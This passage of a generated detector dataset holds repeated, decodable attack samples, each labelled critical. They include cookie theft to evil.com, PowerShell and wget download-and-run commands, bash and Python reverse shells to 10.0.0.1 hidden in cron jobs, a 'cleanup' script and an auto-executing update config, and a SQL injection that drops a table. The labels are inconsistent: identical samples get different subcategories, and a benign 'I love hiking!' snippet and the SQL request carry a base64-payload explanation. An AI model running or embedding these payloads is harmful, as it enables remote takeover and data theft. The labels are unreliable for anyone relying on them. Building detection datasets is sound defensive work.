a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x5852[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00061", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00062", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00063", "source": "hard_negatives", "source_license": "generated", "text": "[2024-02-25 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00064", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00065", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00066", "source": "hard_negatives", "source_license": "generated", "text": "var _0x80c3=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6e48[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00067", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.a152fdca.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00068", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00069", "source": "hard_negatives", "source_license": "generated", "text": "var _0x18ed=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x40f6[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00070", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00071", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00072", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00073", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00074", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00075", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00076", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00077", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.868de45a.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00078", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7cb1=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x7b39[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00079", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.0cb53d1d.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00080", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00081", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00082", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00083", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.49e49da9.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00084", "source": "hard_negatives", "source_license": "generated", "text": "var _0x37eb=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x39d8[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00085", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00086", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.4821b26f.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00087", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00088", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00089", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00090", "source": "hard_negatives", "source_license": "generated", "text": "var _0x0704=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6db2[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00091", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00092", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00093", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00094", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00095", "source": "hard_negatives", "source_license": "generated", "text": "var _0x88f9=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xd332[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00096", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00097", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00098", "source": "hard_negatives", "source_license": "generated", "text": "[2025-08-23 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00099", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.eb3affc3.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00100", "source": "hard_negatives", "source_license": "generated", "text": "[2023-06-28 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00101", "source": "hard_negatives", "source_license": "generated", "text": "var _0xe0fd=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xf258[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00102", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00103", "source": "hard_negatives", "source_license": "generated", "text": "[2024-10-25 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00104", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00105", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7ae9=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x861f[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00106", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.3dc67d6d.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00107", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.c5c3b02d.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00108", "source": "hard_negatives", "source_license": "generated", "text": "[2020-02-18 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00109", "source": "hard_negatives", "source_license": "generated", "text": "var _0xc7b8=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x5d0d[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00110", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00111", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00112", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.ee4ca709.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00113", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.fc4d14f0.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00114", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00115", "source": "hard_negatives", "source_license": "generated", "text": "[2024-12-13 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00116", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00117", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00118", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.86709954.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": 